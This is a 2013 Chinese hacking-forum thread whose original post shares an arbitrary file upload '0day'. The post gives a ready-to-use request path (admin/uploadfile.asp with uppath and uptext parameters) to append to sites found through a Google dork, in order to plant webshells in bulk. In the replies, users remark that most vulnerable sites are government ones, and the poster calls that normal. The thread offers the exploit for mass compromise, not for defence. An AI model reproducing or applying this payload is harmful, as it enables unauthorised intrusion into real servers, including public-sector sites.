查看: 308605|回复: 349

2013.1.29-----任意文件上传漏洞可批量拿shell

  [复制链接]
发表于 2013-1-30 09:02:47 | 显示全部楼层 |阅读模式
转载的。
发布一个0day,是一个任意上传漏洞。

谷歌关键字:
游客,如果您要查看本帖隐藏内容请回复

然后在域名后面添加
  1. admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
复制代码
任意上传拿shell  
图:

QQ截图20130130090139.jpg

评分

参与人数 2i币 +12 收起 理由
Ay's + 2 大部分都是宁波或者其他的ZF网站,有些网站.
90_ + 10 感谢分享

查看全部评分

回复

使用道具 举报

发表于 2013-1-30 09:19:38 | 显示全部楼层
谢谢分享,来试试,,
回复 支持 反对

使用道具 举报

发表于 2013-1-30 09:29:36 | 显示全部楼层
那怎么来看他的上传路径呢?

点评

应该可以通过审核元素找到路径!  详情 回复 发表于 2015-6-24 16:34
回复 支持 反对

使用道具 举报

发表于 2013-1-30 10:02:42 | 显示全部楼层
看下是什么东东
回复 支持 反对

使用道具 举报

发表于 2013-1-30 10:05:13 | 显示全部楼层
楼主,这个关键字百度到275,但是基本都不可用啊,还是GOV的

点评

gov的很正常  详情 回复 发表于 2013-1-30 10:48
回复 支持 1 反对 0

使用道具 举报

发表于 2013-1-30 10:39:07 | 显示全部楼层
最爱Oday了 嘿嘿
回复 支持 反对

使用道具 举报

 楼主| 发表于 2013-1-30 10:48:38 | 显示全部楼层
huc-安阳 发表于 2013-1-30 10:05
楼主,这个关键字百度到275,但是基本都不可用啊,还是GOV的

gov的很正常
回复 支持 反对

使用道具 举报

发表于 2013-1-30 11:17:29 | 显示全部楼层
看看定定
回复 支持 反对

使用道具 举报

meizhou18 该用户已被删除
发表于 2013-1-30 11:33:25 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

aa976102759 该用户已被删除
发表于 2013-1-30 16:12:03 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-6 22:27 , Processed in 0.038148 second(s), 15 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部